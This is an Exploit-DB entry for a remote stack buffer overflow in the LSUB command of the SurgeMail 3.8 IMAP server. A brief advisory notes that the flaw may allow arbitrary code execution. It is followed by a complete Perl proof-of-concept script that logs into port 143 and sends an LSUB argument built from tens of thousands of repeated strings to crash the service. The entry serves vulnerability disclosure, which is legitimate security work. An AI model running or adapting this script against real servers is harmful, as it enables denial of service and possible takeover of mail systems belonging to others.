Surgemail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow

EDB-ID:

31464

CVE:

N/A


Type:

dos


Platform:

Windows

Date:

2008-03-21


source: https://www.securityfocus.com/bid/28377/info

SurgeMail is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.

Successfully exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the affected service. Failed exploit attempts will likely result in denial-of-service conditions.

SurgeMail 3.8k4 is vulnerable; other versions may also be affected.

#
#
#       Surgemail stack overflow PoC exploit - latest version
#	Coded by Leon Juranic <leon.juranic@infigo.hr>
#	http://www.infigo.hr/en/
#

use IO::Socket;


$host = "192.168.0.15";
$user = "test";
$pass = "test";
$str = "//AA:";

$sock = IO::Socket::INET->new(PeerAddr => $host,
        PeerPort => "143",
        Proto    => "tcp") || die ("Cannot connect!!!\n");



        print $a = <$sock>;
        print $sock "a001 LOGIN $user $pass\r\n";
        print $a = <$sock>;
        print $sock "a002 LSUB " . $str x 12000 . " " . $str x 21000 . "\r\n";
        print $a = <$sock>;